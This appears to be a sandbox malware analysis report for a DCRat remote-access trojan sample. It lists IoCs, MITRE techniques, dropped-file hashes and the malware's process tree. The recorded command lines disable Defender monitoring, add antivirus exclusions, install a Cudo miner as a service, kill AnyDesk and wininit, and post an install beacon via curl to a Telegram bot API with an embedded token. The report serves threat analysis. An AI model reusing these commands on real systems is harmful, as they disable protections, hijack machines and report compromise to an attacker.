dcrat | b8afae5969d3fc98aee33c071cf5fe1b326d96bb7516e98096261f6570edcb79

Analysis

max time kernel
13s
max time network
26s
platform
windows7_x64
resource
win7-20220812-en
resource tags

arch:x64arch:x86image:win7-20220812-enlocale:en-usos:windows7-x64system
submitted
10-11-2022 06:09

Sharing

Copy URL

Twitter E-mail

Report Analysis Logs

General

Target

tmp.exe
Size

34.0MB
MD5

aa23503fe31986791d574c378ecc9d96
SHA1

546e9e966cb4f65833f2e7da7707d02268b69b41
SHA256

b8afae5969d3fc98aee33c071cf5fe1b326d96bb7516e98096261f6570edcb79
SHA512

3b3a8ea54f7756233bc3e3744f6ed10e64da660fedd58e514fa1e5893c533125caffba692443dac9cf3925ecd3ea0030ab18a00ed7f20d8d16bfea1eaaca2eec
SSDEEP

786432:/8N4XTCyZBe0CIctk/p4EJSRuJ30H9MReKJXsOsV7pmHzo9K://XTDZB/y1899sZMToc

Score

10^/10

dcrat discovery infostealer persistence rat

Malware Config

Signatures

DcRat
DarkCrystal(DC) is a new .NET RAT active since June 2019 capable of loading additional plugins.
rat infostealer dcrat

DCRat payload 3 IoCs

Detects payload of DCRat, commonly dropped by NSIS installers.

rat

Processes:

resource	yara_rule
C:\Windows\Migration\stil.exe	dcrat
\??\c:\windows\migration\stil.exe	dcrat
\Windows\Migration\stil.exe	dcrat

Creates new service(s) 1 TTPs
persistence

New Service
T1050
Executes dropped EXE 4 IoCs

Processes:

1.exedc.exeany.execudo.exe

pid process

1792 1.exe
1568 dc.exe
2032 any.exe
964 cudo.exe

pid	process
1792	1.exe
1568	dc.exe
2032	any.exe
964	cudo.exe

Loads dropped DLL 14 IoCs

Processes:

tmp.execmd.exe

pid	process
1944	tmp.exe
1944	tmp.exe
1944	tmp.exe
1944	tmp.exe
1944	tmp.exe
1944	tmp.exe
1944	tmp.exe
1944	tmp.exe
1944	tmp.exe
1944	tmp.exe
1944	tmp.exe
1944	tmp.exe
1944	tmp.exe
520	cmd.exe

Modifies file permissions 1 TTPs 1 IoCs
discovery

File Permissions Modification
T1222

Processes:

takeown.exe

pid process

2036 takeown.exe
Drops file in System32 directory 1 IoCs

Processes:

1.exe

description ioc process

File created C:\Windows\System32\GroupPolicy\Machine\Registry.pol 1.exe

pid	process
2036	takeown.exe

description	ioc	process
File created	C:\Windows\System32\GroupPolicy\Machine\Registry.pol	1.exe

Drops file in Program Files directory 5 IoCs

Processes:

cudo.exe

description	ioc	process
File opened for modification	\??\c:\Program files\Cudo Miner	cudo.exe
File created	C:\Program Files\Cudo Miner\__tmp_rar_sfx_access_check_7115143	cudo.exe
File created	C:\Program Files\Cudo Miner\.cudo_minerrc	cudo.exe
File opened for modification	C:\Program Files\Cudo Miner\.cudo_minerrc	cudo.exe
File created	C:\Program Files\Cudo Miner\channel	cudo.exe

Drops file in Windows directory 5 IoCs

Processes:

dc.exe

description	ioc	process
File opened for modification	C:\Windows\Migration\stil.bat	dc.exe
File created	C:\Windows\Migration\stil.exe	dc.exe
File opened for modification	C:\Windows\Migration\stil.exe	dc.exe
File created	C:\Windows\Migration\__tmp_rar_sfx_access_check_7113551	dc.exe
File created	C:\Windows\Migration\stil.bat	dc.exe

Launches sc.exe 3 IoCs
Sc.exe is a Windows utlilty to control services on the system.

Processes:

sc.exesc.exesc.exe

pid process

616 sc.exe
1848 sc.exe
524 sc.exe
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.

System Information Discovery
T1082
Delays execution with timeout.exe 2 IoCs
evasion

Processes:

timeout.exetimeout.exe

pid process

452 timeout.exe
1240 timeout.exe
Enumerates processes with tasklist 1 TTPs 1 IoCs

Process Discovery
T1057

Processes:

tasklist.exe

pid process

1684 tasklist.exe
Kills process with taskkill 2 IoCs
evasion

Processes:

taskkill.exetaskkill.exe

pid process

1936 taskkill.exe
932 taskkill.exe
Runs net.exe
Suspicious behavior: EnumeratesProcesses 5 IoCs

Processes:

powershell.exepowershell.exe1.exepowershell.exe

pid process

1936 powershell.exe
1436 powershell.exe
1792 1.exe
1792 1.exe
1588 powershell.exe

pid	process
616	sc.exe
1848	sc.exe
524	sc.exe

pid	process
452	timeout.exe
1240	timeout.exe

pid	process
1684	tasklist.exe

pid	process
1936	taskkill.exe
932	taskkill.exe

pid	process
1936	powershell.exe
1436	powershell.exe
1792	1.exe
1792	1.exe
1588	powershell.exe

Suspicious use of AdjustPrivilegeToken 7 IoCs

Processes:

powershell.exepowershell.exe1.exepowershell.exe

description	pid	process
Token: SeDebugPrivilege	1936	powershell.exe
Token: SeDebugPrivilege	1436	powershell.exe
Token: SeDebugPrivilege	1792	1.exe
Token: SeAssignPrimaryTokenPrivilege	1792	1.exe
Token: SeIncreaseQuotaPrivilege	1792	1.exe
Token: 0	1792	1.exe
Token: SeDebugPrivilege	1588	powershell.exe

Suspicious use of WriteProcessMemory 48 IoCs

Processes:

tmp.execmd.execmd.exedc.execmd.exe

description	pid	process	target process
PID 1944 wrote to memory of 1936	1944	tmp.exe	powershell.exe
PID 1944 wrote to memory of 1936	1944	tmp.exe	powershell.exe
PID 1944 wrote to memory of 1936	1944	tmp.exe	powershell.exe
PID 1944 wrote to memory of 1936	1944	tmp.exe	powershell.exe
PID 1944 wrote to memory of 1436	1944	tmp.exe	powershell.exe
PID 1944 wrote to memory of 1436	1944	tmp.exe	powershell.exe
PID 1944 wrote to memory of 1436	1944	tmp.exe	powershell.exe
PID 1944 wrote to memory of 1436	1944	tmp.exe	powershell.exe
PID 1944 wrote to memory of 1792	1944	tmp.exe	1.exe
PID 1944 wrote to memory of 1792	1944	tmp.exe	1.exe
PID 1944 wrote to memory of 1792	1944	tmp.exe	1.exe
PID 1944 wrote to memory of 1792	1944	tmp.exe	1.exe
PID 1944 wrote to memory of 1360	1944	tmp.exe	cmd.exe
PID 1944 wrote to memory of 1360	1944	tmp.exe	cmd.exe
PID 1944 wrote to memory of 1360	1944	tmp.exe	cmd.exe
PID 1944 wrote to memory of 1360	1944	tmp.exe	cmd.exe
PID 1944 wrote to memory of 1568	1944	tmp.exe	dc.exe
PID 1944 wrote to memory of 1568	1944	tmp.exe	dc.exe
PID 1944 wrote to memory of 1568	1944	tmp.exe	dc.exe
PID 1944 wrote to memory of 1568	1944	tmp.exe	dc.exe
PID 1360 wrote to memory of 812	1360	cmd.exe	cmd.exe
PID 1360 wrote to memory of 812	1360	cmd.exe	cmd.exe
PID 1360 wrote to memory of 812	1360	cmd.exe	cmd.exe
PID 1360 wrote to memory of 812	1360	cmd.exe	cmd.exe
PID 1944 wrote to memory of 2032	1944	tmp.exe	any.exe
PID 1944 wrote to memory of 2032	1944	tmp.exe	any.exe
PID 1944 wrote to memory of 2032	1944	tmp.exe	any.exe
PID 1944 wrote to memory of 2032	1944	tmp.exe	any.exe
PID 812 wrote to memory of 756	812	cmd.exe	chcp.com
PID 812 wrote to memory of 756	812	cmd.exe	chcp.com
PID 812 wrote to memory of 756	812	cmd.exe	chcp.com
PID 812 wrote to memory of 756	812	cmd.exe	chcp.com
PID 812 wrote to memory of 1588	812	cmd.exe	powershell.exe
PID 812 wrote to memory of 1588	812	cmd.exe	powershell.exe
PID 812 wrote to memory of 1588	812	cmd.exe	powershell.exe
PID 812 wrote to memory of 1588	812	cmd.exe	powershell.exe
PID 1568 wrote to memory of 520	1568	dc.exe	cmd.exe
PID 1568 wrote to memory of 520	1568	dc.exe	cmd.exe
PID 1568 wrote to memory of 520	1568	dc.exe	cmd.exe
PID 1568 wrote to memory of 520	1568	dc.exe	cmd.exe
PID 1944 wrote to memory of 964	1944	tmp.exe	cudo.exe
PID 1944 wrote to memory of 964	1944	tmp.exe	cudo.exe
PID 1944 wrote to memory of 964	1944	tmp.exe	cudo.exe
PID 1944 wrote to memory of 964	1944	tmp.exe	cudo.exe
PID 520 wrote to memory of 1712	520	cmd.exe	stil.exe
PID 520 wrote to memory of 1712	520	cmd.exe	stil.exe
PID 520 wrote to memory of 1712	520	cmd.exe	stil.exe
PID 520 wrote to memory of 1712	520	cmd.exe	stil.exe

C:\Users\Admin\AppData\Local\Temp\tmp.exe
"C:\Users\Admin\AppData\Local\Temp\tmp.exe"
1⤵
- Loads dropped DLL
- Suspicious use of WriteProcessMemory
PID:1944

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Set-MpPreference -DisableRealtimeMonitoring $true
2⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:1936

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath c:\windows\migration , c:\users\kbtgt\desktop , C:\Windows\tasks , C:\Windows , C:\Windows\Logs , C:\Windows\SysWOW64 , C:\Windows\System32\WindowsPowerShell\v1.0 , C:\ProgramData , C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe , powershell.exe
2⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:1436

C:\programdata\1.exe
"C:\programdata\1.exe" /D
2⤵
- Executes dropped EXE
- Drops file in System32 directory
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:1792

C:\programdata\1.exe
"C:\programdata\1.exe" /S 1
3⤵
PID:1020

C:\Windows\SysWOW64\cmd.exe
cmd /c ""C:\programdata\ru.bat" "
2⤵
- Suspicious use of WriteProcessMemory
PID:1360

C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /K "c:\programdata\st.bat"
3⤵
- Suspicious use of WriteProcessMemory
PID:812

C:\Windows\SysWOW64\chcp.com
chcp 65001
4⤵
PID:756

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
powershell Add-MpPreference -ExclusionPath c:\windows\migration\ , c:\users\kbtgt\desktop\ , C:\Windows\tasks\ , C:\Windows\ , C:\Windows\Logs\ , C:\Windows\SysWOW64\ , C:\Windows\System32\WindowsPowerShell\v1.0\ , C:\ProgramData\
4⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:1588

C:\Windows\SysWOW64\tasklist.exe
tasklist /FI "IMAGENAME eq Superfetch.exe"
4⤵
- Enumerates processes with tasklist
PID:1684

C:\Windows\SysWOW64\find.exe
find /I /N "Superfetch.exe"
4⤵
PID:1372

C:\Windows\SysWOW64\takeown.exe
takeown /f c:\windows\tasks
4⤵
- Modifies file permissions
PID:2036

C:\Windows\SysWOW64\timeout.exe
TIMEOUT /T 3 /NOBREAK
4⤵
- Delays execution with timeout.exe
PID:1240

C:\programdata\dc.exe
"C:\programdata\dc.exe"
2⤵
- Executes dropped EXE
- Drops file in Windows directory
- Suspicious use of WriteProcessMemory
PID:1568

C:\Windows\SysWOW64\cmd.exe
cmd /c ""C:\windows\migration\stil.bat" "
3⤵
- Loads dropped DLL
- Suspicious use of WriteProcessMemory
PID:520

\??\c:\windows\migration\stil.exe
"c:\windows\migration\stil.exe"
4⤵
PID:1712

C:\Windows\SysWOW64\WScript.exe
"C:\Windows\System32\WScript.exe" "C:\windows\migration\uolU0W2BGm0r9qjOq.vbe"
5⤵
PID:1188

C:\Windows\SysWOW64\cmd.exe
cmd /c ""C:\windows\migration\JSavDJfGkqsqiENdifm.bat" "
5⤵
PID:844

C:\programdata\any.exe
"C:\programdata\any.exe"
2⤵
- Executes dropped EXE
PID:2032

C:\Windows\SysWOW64\cmd.exe
cmd /c ""C:\programdata\any.bat" "
3⤵
PID:1604

C:\Windows\SysWOW64\findstr.exe
findstr "f16068f1baa86c5d6fcb17179a1aa79461274b2e6011f358d740be2b61143fcf" C:\ProgramData\AnyDesk\service.conf
4⤵
PID:1088

C:\Windows\SysWOW64\forfiles.exe
forfiles /p C:\ProgramData\AnyDesk\ /s /m service.conf /c "cmd /c @if exist @file (@goto 9) "
4⤵
PID:1224

C:\Windows\SysWOW64\chcp.com
chcp 65001
4⤵
PID:1324

C:\Windows\SysWOW64\findstr.exe
findstr /i "AnyDesk"
4⤵
PID:1184

C:\Windows\SysWOW64\sc.exe
sc query type= service
4⤵
- Launches sc.exe
PID:1848

C:\Windows\SysWOW64\sc.exe
sc query type= service
4⤵
- Launches sc.exe
PID:524

C:\Windows\SysWOW64\findstr.exe
findstr /i "Task Schedubler"
4⤵
PID:892

C:\Windows\SysWOW64\net.exe
net stop TaskSc
4⤵
PID:1692

C:\Windows\SysWOW64\net1.exe
C:\Windows\system32\net1 stop TaskSc
5⤵
PID:1356

C:\Windows\SysWOW64\net.exe
net stop AnyDesk
4⤵
PID:968

C:\Windows\SysWOW64\net1.exe
C:\Windows\system32\net1 stop AnyDesk
5⤵
PID:1324

C:\Windows\SysWOW64\taskkill.exe
taskkill /IM anydesk.exe /F
4⤵
- Kills process with taskkill
PID:932

C:\Windows\SysWOW64\taskkill.exe
taskkill /IM wininit.exe /F
4⤵
- Kills process with taskkill
PID:1936

C:\programdata\cudo.exe
"C:\programdata\cudo.exe"
2⤵
- Executes dropped EXE
- Drops file in Program Files directory
PID:964

C:\Windows\SysWOW64\cmd.exe
cmd /c ""C:\Program files\Cudo Miner\run.bat" "
3⤵
PID:1768

C:\Windows\SysWOW64\sc.exe
Sc create TaskScudo1 binPath="C:\Program files\Cudo Miner\Cudo Miner.exe" DisplayName="Task Schedubler1 cudo" type=own start=auto
4⤵
- Launches sc.exe
PID:616

C:\Windows\SysWOW64\timeout.exe
TIMEOUT /T 10 /NOBREAK
4⤵
- Delays execution with timeout.exe
PID:452

C:\Windows\SysWOW64\cmd.exe
cmd.exe /c "c:\windows\system32\curl.exe --insecure --data chat_id=552691400 --data parse-mode=markdown --data-urlencode text="ORXGKKZCDCRat_INSTALLED" "https://api.telegram.org/bot5086556714:AAF7DbEW7CWKb1GEIy6_inxVlrGJ39JUUBM/sendMessage""
1⤵
PID:604

MITRE ATT&CK Matrix ATT&CK v6

Initial Access

Execution

Persistence

New Service

T1050

Privilege Escalation

New Service

T1050

Defense Evasion

File Permissions Modification

T1222

Credential Access

Discovery

System Information Discovery

T1082

Process Discovery

T1057

Lateral Movement

Collection

Exfiltration

Command and Control

Impact

Replay Monitor

Loading Replay Monitor...

Downloads

C:\Program files\Cudo Miner\run.bat
Filesize
332B

MD5
c770f2dddfc870f39356286934fe2b82

SHA1
a5639c014889d7129de1b3209f977cba61b26a73

SHA256
d06a274f6029e3ce205e04a2d46077143a58ac6fd711f769c81721551e3ec96a

SHA512
f238b2f460d8c4de90ec605548e628521b613c4a911255f3ed55d5d2428fd42d981aae0760d4c35e328bb1c03a01d2b31895c16c3cb086ebe3e42de7ee01e179

Download Submit
C:\ProgramData\1.exe
Filesize
775KB

MD5
0442a8479aa5f19dd5a64ddfd677b9f8

SHA1
fa003104e8e8e6646049a49bd517224ba34ac4b6

SHA256
5161a16217b9d8b9817ad1f6e1020e2eb625bbd6ccf82fbf9423077d0c966aa0

SHA512
51ddbff08b54bbafd365e71432697bea5a3eb49bd87dafd477a059f59e1f2f2eaa8e465abda8499745a9a81c6e10a5c44a9a255d51d79d5e8a7b7c25709abe42

Download Submit
C:\ProgramData\1.exe
Filesize
775KB

MD5
0442a8479aa5f19dd5a64ddfd677b9f8

SHA1
fa003104e8e8e6646049a49bd517224ba34ac4b6

SHA256
5161a16217b9d8b9817ad1f6e1020e2eb625bbd6ccf82fbf9423077d0c966aa0

SHA512
51ddbff08b54bbafd365e71432697bea5a3eb49bd87dafd477a059f59e1f2f2eaa8e465abda8499745a9a81c6e10a5c44a9a255d51d79d5e8a7b7c25709abe42

Download Submit
C:\ProgramData\any.exe
Filesize
5.3MB

MD5
bcadcaf78a0cd119dababed7d094e79d

SHA1
c8c2207e554f2f79ddc1587c3fd40b4125ef1e18

SHA256
133ab0f053bdca0c356b4d78dc864a22189738358ff68233326ca571f3974904

SHA512
619bf833a0be0eb7585206437f210defc799590a97fa1732af2b36346a318aafba637efd4b7f2af8e575a047f51ef1f648ecfb2caa56eca8f42e6ab29deb90b2

Download Submit
C:\ProgramData\cudo.exe
Filesize
24.8MB

MD5
0ee363db6fa75ecc7bd90072eaa1e92c

SHA1
23e1be793ef81215d10dc88ae2af51a0e286358a

SHA256
bfc2c42dbd84cfde2443463d464d9778b3ac6e897668c9751ccdbe71c093700c

SHA512
533dd790f4a03f7b4d868fa6132fa0c1a97526954cc61c28cc473ae6ed91691b6c1cabfc708cd3e26aed93b79eaaaf3a20f5be944db77d773431a2b4a89b4e97

Download Submit
C:\ProgramData\curl.exe
Filesize
5.2MB

MD5
104023cef829fce3e34bf1514daff629

SHA1
b6e7b949109298ec7ff1aa64404a859b5b41ccae

SHA256
15b1158d806de14013fdc3f0e81dca725481d2393249994a122c0a70721ae9f5

SHA512
efebee49ffebf0dcb07c6e7d24477101a7c8a2a03b0bea4df9c1054943823026ffd46f54cc51fb8de062e3641f021d5cf0b23ed67d46a549ee23e5fa7b12be1e

Download Submit
C:\ProgramData\dc.exe
Filesize
937KB

MD5
77ff73f3e2469163b1a1d65414e564b9

SHA1
129c82bcacbd17cafe711f51b001f3e4ad704b4b

SHA256
058feeee219f1d24be76441645d391097ca7bee06d357ca35989fa3589fcf61e

SHA512
cd8d3efbccf3ea05f660a9a999d5996894b8ef282e7d67e36ef02699ce04f20f57eb530e13acca3488d96d14ddc5f80ab82a69137421d336a515d7ee567788f0

Download Submit
C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\d93f411851d7c929.customDestinations-ms
Filesize
7KB

MD5
3146e62d6fa8ebdedc1c470156a1ed4f

SHA1
adddba162161aa3c562fc9e19b7d79cbe5dedc83

SHA256
d4dc38effbcdd339266be0991b94bd7aeedc0e12cca50d8570ec895add682c23

SHA512
3588660bf77276af628e94c3094d5f9cc0bf2a4928a72a342785807fcd7ea3028f29490ba65545afebea0d707a8e7a32b5d67f0d4aeae05475813d124cf9d858

Download Submit
C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\d93f411851d7c929.customDestinations-ms
Filesize
7KB

MD5
3146e62d6fa8ebdedc1c470156a1ed4f

SHA1
adddba162161aa3c562fc9e19b7d79cbe5dedc83

SHA256
d4dc38effbcdd339266be0991b94bd7aeedc0e12cca50d8570ec895add682c23

SHA512
3588660bf77276af628e94c3094d5f9cc0bf2a4928a72a342785807fcd7ea3028f29490ba65545afebea0d707a8e7a32b5d67f0d4aeae05475813d124cf9d858

Download Submit
C:\Windows\Migration\stil.exe
Filesize
1.4MB

MD5
ef77d181363454db33269e5dbc7df52d

SHA1
8ed6fb213dedbaa39d4bc2d8f522882df2a183f6

SHA256
0cf3ede0f5649e4c9204ffc2ef07c705ab13025269ef24ecf9353e37feec05bf

SHA512
4cfee186c270d38e4ff48ddfbe02f1789d9f85afd19ba2b4ccd2945f1de16607c0560f3f8b7b92631abe2495a06d859de0a90c876c19a3fa5ab0b7757c324f18

Download Submit
C:\programdata\1.exe
Filesize
775KB

MD5
0442a8479aa5f19dd5a64ddfd677b9f8

SHA1
fa003104e8e8e6646049a49bd517224ba34ac4b6

SHA256
5161a16217b9d8b9817ad1f6e1020e2eb625bbd6ccf82fbf9423077d0c966aa0

SHA512
51ddbff08b54bbafd365e71432697bea5a3eb49bd87dafd477a059f59e1f2f2eaa8e465abda8499745a9a81c6e10a5c44a9a255d51d79d5e8a7b7c25709abe42

Download Submit
C:\programdata\any.bat
Filesize
5KB

MD5
ca17b8b0772b3f1ddcf74ad177e16652

SHA1
b5706a18848a819e09136634f48a23eaadaaaf2a

SHA256
283d7be6d4f732d1b0f614ce674e387b29b9c8a375f17be133aa03cdebbeb5e1

SHA512
59bd7143297729b0e4c99f84f0340d13f61b17d9e9505dd11a2fd47c995860faea24733367ce53dd4a165bb806e83ab508f59df3ebd20963187d2f7c53f2d965

Download Submit
C:\programdata\any.exe
Filesize
5.3MB

MD5
bcadcaf78a0cd119dababed7d094e79d

SHA1
c8c2207e554f2f79ddc1587c3fd40b4125ef1e18

SHA256
133ab0f053bdca0c356b4d78dc864a22189738358ff68233326ca571f3974904

SHA512
619bf833a0be0eb7585206437f210defc799590a97fa1732af2b36346a318aafba637efd4b7f2af8e575a047f51ef1f648ecfb2caa56eca8f42e6ab29deb90b2

Download Submit
C:\programdata\cudo.exe
Filesize
24.8MB

MD5
0ee363db6fa75ecc7bd90072eaa1e92c

SHA1
23e1be793ef81215d10dc88ae2af51a0e286358a

SHA256
bfc2c42dbd84cfde2443463d464d9778b3ac6e897668c9751ccdbe71c093700c

SHA512
533dd790f4a03f7b4d868fa6132fa0c1a97526954cc61c28cc473ae6ed91691b6c1cabfc708cd3e26aed93b79eaaaf3a20f5be944db77d773431a2b4a89b4e97

Download Submit
C:\programdata\dc.exe
Filesize
937KB

MD5
77ff73f3e2469163b1a1d65414e564b9

SHA1
129c82bcacbd17cafe711f51b001f3e4ad704b4b

SHA256
058feeee219f1d24be76441645d391097ca7bee06d357ca35989fa3589fcf61e

SHA512
cd8d3efbccf3ea05f660a9a999d5996894b8ef282e7d67e36ef02699ce04f20f57eb530e13acca3488d96d14ddc5f80ab82a69137421d336a515d7ee567788f0

Download Submit
C:\programdata\ru.bat
Filesize
32B

MD5
11e08b5abf3f1675f99c96f78c128b23

SHA1
40d6dd08262ef959328aec4dc5ed07532232037c

SHA256
50ac09332ff9d6521244b4f9cf6fd9cc489b3324ed1316e07f6a5904230397e7

SHA512
3005767016b4c5da031fb2ac5288b01821d54768b5e099e1157d4fa4621a078d589e54d9c5c89ded58ac3ca94395dacbf1d840f9210f909d3c9dfe8092de8ff9

Download Submit
C:\windows\migration\JSavDJfGkqsqiENdifm.bat
Filesize
247B

MD5
fc5ec3ff9649116b136de34a5392d0ad

SHA1
1b90ad7ac2e090f7329a7c5ec1aa990ef5fab0ac

SHA256
2be1fbc591d39d659e78febb13ac9296a06d460ad104a46aa4592bc4803a8ade

SHA512
2b934c01f492636b97ab92c2dbff3ba81fecf2f0106bd4cc82ab69c2257ce21e3776fecda3c7f2592e21cd3d5ae44dfd9eaf496d922a1a8d5786f47ad16b7cf7

Download Submit
C:\windows\migration\stil.bat
Filesize
137B

MD5
9eccaebd46aae980b76f38eb0dbb9ebc

SHA1
130f18fcef7f5d82b4db72d8c4d2b5a75991876a

SHA256
a7ff0a0e3d0ffeb443fba73a61fd306dc3a2678f3c1b52411bc76969959a58c8

SHA512
c2a486db3069b3006ee360feed3f7d41f0790faeb649261021d91b75c5806e3410bdd23079d1291038edec981d11dedb2d6e7d7cedbf8ed0b8c469c5a3b1eb3a

Download Submit
C:\windows\migration\uolU0W2BGm0r9qjOq.vbe
Filesize
222B

MD5
0084d046f55786279d1bb14a8fdc71e0

SHA1
4ae12232e4767111987f3667017e0ec826289867

SHA256
d236d16b7c3d7f240e2cb95fae6216fa69238763e91c779098839ffb12a71571

SHA512
567cd877880afab09948d5d4cfde8b6f146a8af575acbfa8524f68a9fc280df63f05115f35b6280eccaaa3f51153a01c58a8ffdd8d86c60144361367ff2d27ff

Download Submit
\??\c:\programdata\st.bat
Filesize
3KB

MD5
6740b5dadb1b8d82a39c3455032cff24

SHA1
cdce0504227a6db11eca44e5eebb8b4f3013bee2

SHA256
627b5cbd97ecc97321be845a7a1733287a9a98d705370c01781f30c939452630

SHA512
83194aba7dadee40d7f7b2f5384f4a5a97cbba9c6975819fdebcf72f68aa0eca3529dbe7dd5f3e81c6e592e91f47d2a0ce4895ffbd7fcd7054f0bdc0cbc23abf

Download Submit
\??\c:\windows\migration\stil.exe
Filesize
1.4MB

MD5
ef77d181363454db33269e5dbc7df52d

SHA1
8ed6fb213dedbaa39d4bc2d8f522882df2a183f6

SHA256
0cf3ede0f5649e4c9204ffc2ef07c705ab13025269ef24ecf9353e37feec05bf

SHA512
4cfee186c270d38e4ff48ddfbe02f1789d9f85afd19ba2b4ccd2945f1de16607c0560f3f8b7b92631abe2495a06d859de0a90c876c19a3fa5ab0b7757c324f18

Download Submit
\ProgramData\1.exe
Filesize
775KB

MD5
0442a8479aa5f19dd5a64ddfd677b9f8

SHA1
fa003104e8e8e6646049a49bd517224ba34ac4b6

SHA256
5161a16217b9d8b9817ad1f6e1020e2eb625bbd6ccf82fbf9423077d0c966aa0

SHA512
51ddbff08b54bbafd365e71432697bea5a3eb49bd87dafd477a059f59e1f2f2eaa8e465abda8499745a9a81c6e10a5c44a9a255d51d79d5e8a7b7c25709abe42

Download Submit
\ProgramData\1.exe
Filesize
775KB

MD5
0442a8479aa5f19dd5a64ddfd677b9f8

SHA1
fa003104e8e8e6646049a49bd517224ba34ac4b6

SHA256
5161a16217b9d8b9817ad1f6e1020e2eb625bbd6ccf82fbf9423077d0c966aa0

SHA512
51ddbff08b54bbafd365e71432697bea5a3eb49bd87dafd477a059f59e1f2f2eaa8e465abda8499745a9a81c6e10a5c44a9a255d51d79d5e8a7b7c25709abe42

Download Submit
\ProgramData\1.exe
Filesize
775KB

MD5
0442a8479aa5f19dd5a64ddfd677b9f8

SHA1
fa003104e8e8e6646049a49bd517224ba34ac4b6

SHA256
5161a16217b9d8b9817ad1f6e1020e2eb625bbd6ccf82fbf9423077d0c966aa0

SHA512
51ddbff08b54bbafd365e71432697bea5a3eb49bd87dafd477a059f59e1f2f2eaa8e465abda8499745a9a81c6e10a5c44a9a255d51d79d5e8a7b7c25709abe42

Download Submit
\ProgramData\1.exe
Filesize
775KB

MD5
0442a8479aa5f19dd5a64ddfd677b9f8

SHA1
fa003104e8e8e6646049a49bd517224ba34ac4b6

SHA256
5161a16217b9d8b9817ad1f6e1020e2eb625bbd6ccf82fbf9423077d0c966aa0

SHA512
51ddbff08b54bbafd365e71432697bea5a3eb49bd87dafd477a059f59e1f2f2eaa8e465abda8499745a9a81c6e10a5c44a9a255d51d79d5e8a7b7c25709abe42

Download Submit
\ProgramData\any.exe
Filesize
5.3MB

MD5
bcadcaf78a0cd119dababed7d094e79d

SHA1
c8c2207e554f2f79ddc1587c3fd40b4125ef1e18

SHA256
133ab0f053bdca0c356b4d78dc864a22189738358ff68233326ca571f3974904

SHA512
619bf833a0be0eb7585206437f210defc799590a97fa1732af2b36346a318aafba637efd4b7f2af8e575a047f51ef1f648ecfb2caa56eca8f42e6ab29deb90b2

Download Submit
\ProgramData\any.exe
Filesize
5.3MB

MD5
bcadcaf78a0cd119dababed7d094e79d

SHA1
c8c2207e554f2f79ddc1587c3fd40b4125ef1e18

SHA256
133ab0f053bdca0c356b4d78dc864a22189738358ff68233326ca571f3974904

SHA512
619bf833a0be0eb7585206437f210defc799590a97fa1732af2b36346a318aafba637efd4b7f2af8e575a047f51ef1f648ecfb2caa56eca8f42e6ab29deb90b2

Download Submit
\ProgramData\any.exe
Filesize
5.3MB

MD5
bcadcaf78a0cd119dababed7d094e79d

SHA1
c8c2207e554f2f79ddc1587c3fd40b4125ef1e18

SHA256
133ab0f053bdca0c356b4d78dc864a22189738358ff68233326ca571f3974904

SHA512
619bf833a0be0eb7585206437f210defc799590a97fa1732af2b36346a318aafba637efd4b7f2af8e575a047f51ef1f648ecfb2caa56eca8f42e6ab29deb90b2

Download Submit
\ProgramData\cudo.exe
Filesize
24.8MB

MD5
0ee363db6fa75ecc7bd90072eaa1e92c

SHA1
23e1be793ef81215d10dc88ae2af51a0e286358a

SHA256
bfc2c42dbd84cfde2443463d464d9778b3ac6e897668c9751ccdbe71c093700c

SHA512
533dd790f4a03f7b4d868fa6132fa0c1a97526954cc61c28cc473ae6ed91691b6c1cabfc708cd3e26aed93b79eaaaf3a20f5be944db77d773431a2b4a89b4e97

Download Submit
\ProgramData\cudo.exe
Filesize
24.8MB

MD5
0ee363db6fa75ecc7bd90072eaa1e92c

SHA1
23e1be793ef81215d10dc88ae2af51a0e286358a

SHA256
bfc2c42dbd84cfde2443463d464d9778b3ac6e897668c9751ccdbe71c093700c

SHA512
533dd790f4a03f7b4d868fa6132fa0c1a97526954cc61c28cc473ae6ed91691b6c1cabfc708cd3e26aed93b79eaaaf3a20f5be944db77d773431a2b4a89b4e97

Download Submit
\ProgramData\cudo.exe
Filesize
24.8MB

MD5
0ee363db6fa75ecc7bd90072eaa1e92c

SHA1
23e1be793ef81215d10dc88ae2af51a0e286358a

SHA256
bfc2c42dbd84cfde2443463d464d9778b3ac6e897668c9751ccdbe71c093700c

SHA512
533dd790f4a03f7b4d868fa6132fa0c1a97526954cc61c28cc473ae6ed91691b6c1cabfc708cd3e26aed93b79eaaaf3a20f5be944db77d773431a2b4a89b4e97

Download Submit
\ProgramData\dc.exe
Filesize
937KB

MD5
77ff73f3e2469163b1a1d65414e564b9

SHA1
129c82bcacbd17cafe711f51b001f3e4ad704b4b

SHA256
058feeee219f1d24be76441645d391097ca7bee06d357ca35989fa3589fcf61e

SHA512
cd8d3efbccf3ea05f660a9a999d5996894b8ef282e7d67e36ef02699ce04f20f57eb530e13acca3488d96d14ddc5f80ab82a69137421d336a515d7ee567788f0

Download Submit
\ProgramData\dc.exe
Filesize
937KB

MD5
77ff73f3e2469163b1a1d65414e564b9

SHA1
129c82bcacbd17cafe711f51b001f3e4ad704b4b

SHA256
058feeee219f1d24be76441645d391097ca7bee06d357ca35989fa3589fcf61e

SHA512
cd8d3efbccf3ea05f660a9a999d5996894b8ef282e7d67e36ef02699ce04f20f57eb530e13acca3488d96d14ddc5f80ab82a69137421d336a515d7ee567788f0

Download Submit
\ProgramData\dc.exe
Filesize
937KB

MD5
77ff73f3e2469163b1a1d65414e564b9

SHA1
129c82bcacbd17cafe711f51b001f3e4ad704b4b

SHA256
058feeee219f1d24be76441645d391097ca7bee06d357ca35989fa3589fcf61e

SHA512
